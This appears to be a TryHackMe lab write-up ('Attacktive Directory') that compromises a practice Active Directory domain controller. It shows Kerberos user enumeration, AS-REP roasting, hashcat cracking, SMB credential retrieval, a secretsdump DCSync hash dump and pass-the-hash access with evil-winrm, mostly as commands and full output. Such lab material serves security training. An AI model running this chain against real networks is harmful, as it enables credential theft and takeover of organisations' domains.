السَّلَامُ عَلَيْكُمْ وَرَحْمَةُ اللَّهِ وَبَرَكَاتُهُ، بِسْمِ اللَّهِ، وَالصَّلَاةُ وَالسَّلَامُ عَلَى رَسُولِ اللَّهِ، الْحَمْدُ لِلَّهِ الَّذِي عَلَّمَ بِالْقَلَمِ، عَلَّمَ الإِنسَانَ مَا لَمْ يَعْلَمْ، وَالصَّلَاةُ وَالسَّلَامُ عَلَى خَيْرِ مُعَلِّمٍ النَّاسَ الْخَيْرَ، مُحَمَّدٍ صَلَّى اللَّهُ عَلَيْهِ وَسَلَّمَ، أَمَّا بَعْدُ

Intro#

99% of Corporate networks run off Active Directory. From this machine you will have a basic understanding on how to exploit such an environment.

Learning Objectives#

AD Enumeration
Kerberos
Cracking Hashes
Impacket

Challenge #

Tools#

Setup#

get Impacket:#

1
 git clone <https://github.com/SecureAuthCorp/impacket.git> /opt/impacket

install pip for Python3#

1
sudo apt install python3-pip

install prereqs#

1
pip3 install -r /opt/impacket/requirements.txt

install impacket#

1
cd /opt/impacket && sudo python3 ./setup.py install

install bloodhound and neo4j#

1
sudo apt install bloodhound neo4j

Enumeration#

1
nmap -sV -v 10.10.98.191 -A

Here we go the result :

1
PORT     STATE SERVICE       VERSION
2
53/tcp   open  domain?
3
| fingerprint-strings:
4
|   DNSVersionBindReqTCP:
5
|     version
6
|_    bind
7
80/tcp   open  http          Microsoft IIS httpd 10.0
8
| http-methods:
9
|_  Potentially risky methods: TRACE
10
|_http-server-header: Microsoft-IIS/10.0
11
|_http-title: IIS Windows Server
12
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
13
135/tcp  open  msrpc         Microsoft Windows RPC
14
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
15
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
16
445/tcp  open  microsoft-ds?
17
464/tcp  open  kpasswd5?
18
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
19
636/tcp  open  tcpwrapped
20
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
21
3269/tcp open  tcpwrapped
22
3389/tcp open  ms-wbt-server Microsoft Terminal Services
23
| rdp-ntlm-info:
24
|   Target_Name: THM-AD
25
|   NetBIOS_Domain_Name: THM-AD
26
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
27
|   DNS_Domain_Name: spookysec.local
28
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
29
|   Product_Version: 10.0.17763
30
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Which tool do we use to enumerate port 139/445 (SMB)?#

A well known tool to do so is enum4linux this was also hinted at in the brief xD: .

Find out what the NetBIOS-Domain name is of the machine#

To got this we must use enum4linux so the command :

1
enum4linux <Machine-ip>

So we got big output but we focus on NetBIOS Domain Name

What invalid TLD do people commonly use for their Active Directory Domain?#

AS we see in namp output we notes that Domain Name being spookysec.local

1
|   Target_Name: THM-AD
2
|   NetBIOS_Domain_Name: THM-AD
3
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
4
|   DNS_Domain_Name: spookysec.local
5
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local

So .local is often miss-used as a .TLD (Top Level Domain)

Enumerating Users via Kerberos#

First we will enumerate with this lists

How to enumerate valid users with `kerbrute`?#

Kerbrute Tool has a parameter userenum to enumerate valid usernames, To enumerate valid usernames from the userlist.txt provided to us we run this command:

1
kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt

Here we go , we got this output :

1
[👾]   )#  kerbrute userenum --dc 10.10.24.200 -d spookysec.local usrlst -t 100                                     [/root]
2

3
    __             __               __
4
   / /_____  _____/ /_  _______  __/ /____
5
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
6
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
7
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
8

9
Version: dev (n/a) - 09/23/25 - Ronnie Flathers @ropnop
10

11
2025/09/23 09:13:00 >  Using KDC(s):
12
2025/09/23 09:13:00 >   10.10.24.200:88
13

14
2025/09/23 09:13:01 >  [+] VALID USERNAME:       james@spookysec.local
15
2025/09/23 09:13:02 >  [+] VALID USERNAME:       svc-admin@spookysec.local
16
2025/09/23 09:13:03 >  [+] VALID USERNAME:       James@spookysec.local
17
2025/09/23 09:13:03 >  [+] VALID USERNAME:       robin@spookysec.local
18
2025/09/23 09:13:07 >  [+] VALID USERNAME:       darkstar@spookysec.local
19
2025/09/23 09:13:11 >  [+] VALID USERNAME:       administrator@spookysec.local
20
2025/09/23 09:13:23 >  [+] VALID USERNAME:       backup@spookysec.local
21
2025/09/23 09:13:27 >  [+] VALID USERNAME:       paradox@spookysec.local
22
2025/09/23 09:13:44 >  [+] VALID USERNAME:       JAMES@spookysec.local
23
2025/09/23 09:13:49 >  [+] VALID USERNAME:       Robin@spookysec.local
24
2025/09/23 09:14:20 >  [+] VALID USERNAME:       Administrator@spookysec.local
25
2025/09/23 09:15:34 >  [+] VALID USERNAME:       Darkstar@spookysec.local
26
2025/09/23 09:15:58 >  [+] VALID USERNAME:       Paradox@spookysec.local
27
2025/09/23 09:17:24 >  [+] VALID USERNAME:       DARKSTAR@spookysec.local
28
2025/09/23 09:17:47 >  [+] VALID USERNAME:       ori@spookysec.local
29
2025/09/23 09:18:31 >  [+] VALID USERNAME:       ROBIN@spookysec.local
30
2025/09/23 09:20:12 >  Done! Tested 73317 usernames (16 valid) in 431.760 seconds

We notes this accounts :

svc-admin@spookysec.local
backup@spookysec.local
administrator@spookysec.local

Abusing Kerberos#

we can attempt to abuse a feature with an attack method called ASRreproasting. This occurs when a user account has the privilege “Does not require Pre-Authentication” set. So the account in question does not need to provide valid identification before requesting a Kerberos Ticket.

So we’ll use tool called GetNpUsers from Impacket that we can use to query ASReproastable accounts from the Key Distribution Center.

and it’s takes valid username from Kerbrute output , So we’ll run the following command :

Test backup username :

1
GetNPUsers spookysec.local/backup -no-pass -dc-ip <ip>

and i got this :

1
Impacket v0.13.0.dev0+20250919.210843.8426ec99 - Copyright Fortra, LLC and its affiliated companies
2

3
[*] Getting TGT for backup
4
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set

lets test it with svc-admin:

1
GetNPUsers spookysec.local/svc-admin -no-pass -dc-ip <ip>

And here we go we got this great output

1
[*] Getting TGT for svc-admin
2
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:5dbf3fab08d44a414465862a7df602ca$b01ea118a95ae0c5479689cd138f9507b0bbf00ed4e4adbd7f47521566996703a5ec2021550040d732fb682e8c5f92aa911779fefb94cccf9b33fdd5d786bc3f1debffc6a04cdb85d2c7c7b631029dec8f0fd4d17619fa11e16d1feeac79bc4c0c7c2f71dbbbb85dab0ca67db56662a60caabeca1b64ff3841788f85245aba9ff902174d58f495be0b125a808489b384c1580adafaa69718c12b0605d6f161690b29574e426afcf8b737da61218ad84835d4eb274ed3b492d7de3c171fcb7fd1f1682c2c433cbd2cb95872607bd2b863c348b18be74cb51dd7ab2576fb054a50a93e8b73b6b9e15b97631f0395458dcf6152

Then we got a hash back! Looking at the HashCat examples wiki page, this appears to be Kerberos 5 AS-REP etype 23, which is mode 18200. We can save this full hash to a file and then specify the mode, hash and dictionary like this command :

1
hashcat -m 18200 hash.txt passwordlist.txt

And we got this :

1
[👾]   )#  hashcat -m 18200 hash passwo                                                                             [/root]
2
hashcat (v6.2.6) starting
3

4
OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
5
====================================================================================================================================================
6
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-14650HX, 2856/5776 MB (1024 MB allocatable), 24MCU
7

8
Minimum password length supported by kernel: 0
9
Maximum password length supported by kernel: 256
10

11
Hashes: 1 digests; 1 unique digests, 1 unique salts
12
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
13
Rules: 1
14

15
Optimizers applied:
16
* Zero-Byte
17
* Not-Iterated
18
* Single-Hash
19
* Single-Salt
20

21
ATTENTION! Pure (unoptimized) backend kernels selected.
22
Pure kernels can crack longer passwords, but drastically reduce performance.
23
If you want to switch to optimized kernels, append -O to your commandline.
24
See the above message to find out about the exact limits.
25

26
Watchdog: Temperature abort trigger set to 90c
27

28
Host memory required for this attack: 6 MB
29

30
Dictionary cache built:
31
* Filename..: passwo
32
* Passwords.: 70188
33
* Bytes.....: 569236
34
* Keyspace..: 70188
35
* Runtime...: 0 secs
36

37
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:5dbf3fab08d44a414465862a7df602ca$b01ea118a95ae0c5479689cd138f9507b0bbf00ed4e4adbd7f47521566996703a5ec2021550040d732fb682e8c5f92aa911779fefb94cccf9b33fdd5d786bc3f1debffc6a04cdb85d2c7c7b631029dec8f0fd4d17619fa11e16d1feeac79bc4c0c7c2f71dbbbb85dab0ca67db56662a60caabeca1b64ff3841788f85245aba9ff902174d58f495be0b125a808489b384c1580adafaa69718c12b0605d6f161690b29574e426afcf8b737da61218ad84835d4eb274ed3b492d7de3c171fcb7fd1f1682c2c433cbd2cb95872607bd2b863c348b18be74cb51dd7ab2576fb054a50a93e8b73b6b9e15b97631f0395458dcf6152:management2005
38

39
Session..........: hashcat
40
Status...........: Cracked
41
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
42
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:5dbf3fab08d...cf6152
43
Time.Started.....: Tue Sep 23 09:32:18 2025 (0 secs)
44
Time.Estimated...: Tue Sep 23 09:32:18 2025 (0 secs)
45
Kernel.Feature...: Pure Kernel
46
Guess.Base.......: File (passwo)
47
Guess.Queue......: 1/1 (100.00%)
48
Speed.#1.........:   225.9 kH/s (2.29ms) @ Accel:512 Loops:1 Thr:1 Vec:8
49
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
50
Progress.........: 12288/70188 (17.51%)
51
Rejected.........: 0/12288 (0.00%)
52
Restore.Point....: 0/70188 (0.00%)
53
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
54
Candidate.Engine.: Device Generator
55
Candidates.#1....: m123456 -> henrik
56
Hardware.Mon.#1..: Util:  4%
57

58
Started: Tue Sep 23 09:31:52 2025
59
Stopped: Tue Sep 23 09:32:20 2025

So from the hashcat output the password is management2005 .

Enumeration – With Credentials#

Now that we have credentials, we can try to enumerate shares and use the credentials to get more details back

so we’ll run this command with smbclient tool :

1
smbclient -L <ip> -U svc-admin

Note : (- L for list of shares )

And we got this output :

1
[👾]   )#  smbclient -L 10.10.24.200 -U svc-admin                                                                                                                                                        [/root]
2
Password for [WORKGROUP\svc-admin]:
3

4
        Sharename       Type      Comment
5
        ---------       ----      -------
6
        ADMIN$          Disk      Remote Admin
7
        backup          Disk
8
        C$              Disk      Default share
9
        IPC$            IPC       Remote IPC
10
        NETLOGON        Disk      Logon server share
11
        SYSVOL          Disk      Logon server share
12
Reconnecting with SMB1 for workgroup listing.
13
do_connect: Connection to 10.10.24.200 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
14
Unable to connect with SMB1 -- no workgroup available

Next I started going down the list with svc-admin‘s credentials, we have access to the backup share, which we can access with this command :

1
smbclient \\\\<ip>\\backup -U svc-admin

And we got this :

1
[👾]   )#  smbclient \\\\10.10.24.200\\backup -U svc-admin                                                                                                                                               [/root]
2
Password for [WORKGROUP\svc-admin]:
3
Try "help" to get a list of possible commands.
4
smb: \> dir
5
  .                                   D        0  Sat Apr  4 21:08:39 2020
6
  ..                                  D        0  Sat Apr  4 21:08:39 2020
7
  backup_credentials.txt              A       48  Sat Apr  4 21:08:53 2020
8

9
                8247551 blocks of size 4096. 3636231 blocks available
10
smb: \> get backup_credentials.txt
11
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
12
smb: \> get backup_credentials.txt
13
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
14
smb: \> ^Z
15
[5]  + 228797 suspended  smbclient \\\\10.10.24.200\\backup -U svc-admin

And when open the file we already got it from smb connection we see that :

1
[👾]   )#  cat backup_credentials.txt                                                                                                                                                                    [/root]
2
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

So lets try to decode with base64 with this command :

1
[👾]   )#  base64 -d backup_credentials.txt

and we got this credentials :

1
backup@spookysec.local:backup2517860

Elevating Privileges#

With our new credentials, we could have elevated access. This backup account could be the backup for the entire Domain Controller that would allow all AD changes to be synced to this account, including password hashes. We can use a different impacket tool called secretsdump.pyto retrieve all the password hashes we could have access with this command:

1
secretsdump.py -dc-ip <ip> -target-ip <ip> backup@spookysec.local

And here we go we got this :

1
[👾]   )#  secretsdump.py -just-dc backup@10.10.24.200                                                                                                                                                   [/root]
2
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
3
  __import__('pkg_resources').run_script('impacket==0.13.0.dev0+20250919.210843.8426ec99', 'secretsdump.py')
4
Impacket v0.13.0.dev0+20250919.210843.8426ec99 - Copyright Fortra, LLC and its affiliated companies
5

6
Password:
7
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
8
[*] Using the DRSUAPI method to get NTDS.DIT secrets
9
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
10
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
11
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
12
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
13
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
14
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
15
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
16
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
17
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
18
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
19
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
20
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
21
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
22
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
23
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
24
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
25
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
26
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:b5b6437f2612905fdacd1dd9f55e2d3a:::
27
[*] Kerberos keys grabbed
28
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
29
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
30
Administrator:des-cbc-md5:2079ce0e5df189ad
31
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
32
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
33
krbtgt:des-cbc-md5:b94f97e97fabbf5d
34
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
35
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
36
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
37
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
38
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
39
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
40
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
41
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
42
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
43
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
44
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
45
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
46
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
47
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
48
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
49
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
50
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
51
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
52
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
53
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
54
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
55
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
56
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
57
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
58
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
59
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
60
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
61
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
62
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
63
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
64
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
65
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
66
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
67
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
68
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
69
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
70
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
71
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
72
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
73
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
74
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
75
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
76
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:190460f347b3b4b9a4530704130a10e1962ca8c17e94a55062c83871a37aabb4
77
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:7968b73916c040e3a84e6e90d8e83c86
78
ATTACKTIVEDIREC$:des-cbc-md5:52b94abc70c27f79

Now we’ll use evil-winrm tool with this command :

1
evil-winrm -i <ip> -u Administrator -H <hash>

Note: the hash is NT hash see this example :

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::

The NET hash is 0e0363213e37b94221497260b0bcb4fc .

And after run command i discover the Machine to found the flag and this is my process to found them :

Administrator Flag#

1
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
2
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd Desktop
3
Cannot find path 'C:\Users\Administrator\Documents\Desktop' because it does not exist.
4
At line:1 char:1
5
+ cd Desktop
6
+ ~~~~~~~~~~
7
    + CategoryInfo          : ObjectNotFound: (C:\Users\Administrator\Documents\Desktop:String) [Set-Location], ItemNotFoundException
8
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
9
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
10
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
11
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
12

13

14
    Directory: C:\Users\Administrator\Desktop
15

16

17
Mode                LastWriteTime         Length Name
18
----                -------------         ------ ----
19
-a----         4/4/2020  11:39 AM             32 root.txt
20

21

22
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
23
TryHackMe{Brahh go and try }

svc-admin flag#

1
*Evil-WinRM* PS C:\Users> dir
2

3

4
    Directory: C:\Users
5

6

7
Mode                LastWriteTime         Length Name
8
----                -------------         ------ ----
9
d-----        9/17/2020   4:04 PM                a-spooks
10
d-----        9/17/2020   4:02 PM                Administrator
11
d-----         4/4/2020  12:19 PM                backup
12
d-----         4/4/2020   1:07 PM                backup.THM-AD
13
d-r---         4/4/2020  11:19 AM                Public
14
d-----         4/4/2020  12:18 PM                svc-admin
15

16

17
*Evil-WinRM* PS C:\Users> cd svc-admin
18
*Evil-WinRM* PS C:\Users\svc-admin> dir
19

20

21
    Directory: C:\Users\svc-admin
22

23

24
Mode                LastWriteTime         Length Name
25
----                -------------         ------ ----
26
d-r---         4/4/2020  12:18 PM                3D Objects
27
d-r---         4/4/2020  12:18 PM                Contacts
28
d-r---         4/4/2020  12:18 PM                Desktop
29
d-r---         4/4/2020  12:18 PM                Documents
30
d-r---         4/4/2020  12:18 PM                Downloads
31
d-r---         4/4/2020  12:18 PM                Favorites
32
d-r---         4/4/2020  12:18 PM                Links
33
d-r---         4/4/2020  12:18 PM                Music
34
d-r---         4/4/2020  12:18 PM                Pictures
35
d-r---         4/4/2020  12:18 PM                Saved Games
36
d-r---         4/4/2020  12:18 PM                Searches
37
d-r---         4/4/2020  12:18 PM                Videos
38

39

40
*Evil-WinRM* PS C:\Users\svc-admin> cd Documents
41
*Evil-WinRM* PS C:\Users\svc-admin\Documents> dir
42
*Evil-WinRM* PS C:\Users\svc-admin\Documents> dir
43
*Evil-WinRM* PS C:\Users\svc-admin\Documents> cd ..
44
*Evil-WinRM* PS C:\Users\svc-admin> cd Desktop
45
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir
46

47

48
    Directory: C:\Users\svc-admin\Desktop
49

50

51
Mode                LastWriteTime         Length Name
52
----                -------------         ------ ----
53
-a----         4/4/2020  12:18 PM             28 user.txt.txt
54

55

56
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> cat user.txt.txt
57
TryHackMe{you stilll !!!!!!!!!}

backup flag#

1
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> cd ..
2
*Evil-WinRM* PS C:\Users\svc-admin> cd ..
3
*Evil-WinRM* PS C:\Users> cd backup
4
*Evil-WinRM* PS C:\Users\backup> cd Desktop
5
*Evil-WinRM* PS C:\Users\backup\Desktop> dir
6

7

8
    Directory: C:\Users\backup\Desktop
9

10

11
Mode                LastWriteTime         Length Name
12
----                -------------         ------ ----
13
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt
14

15

16
*Evil-WinRM* PS C:\Users\backup\Desktop> cat PrivEsc.txt
17
TryHackMe{nahh hehe }

This machine was a great reminder that every small clue can lead to a bigger breakthrough. By following a structured approach — reconnaissance, exploitation, and privilege escalation — we managed to complete it step by step. Hopefully this write-up helps others facing the same challenge.

美しいミズキ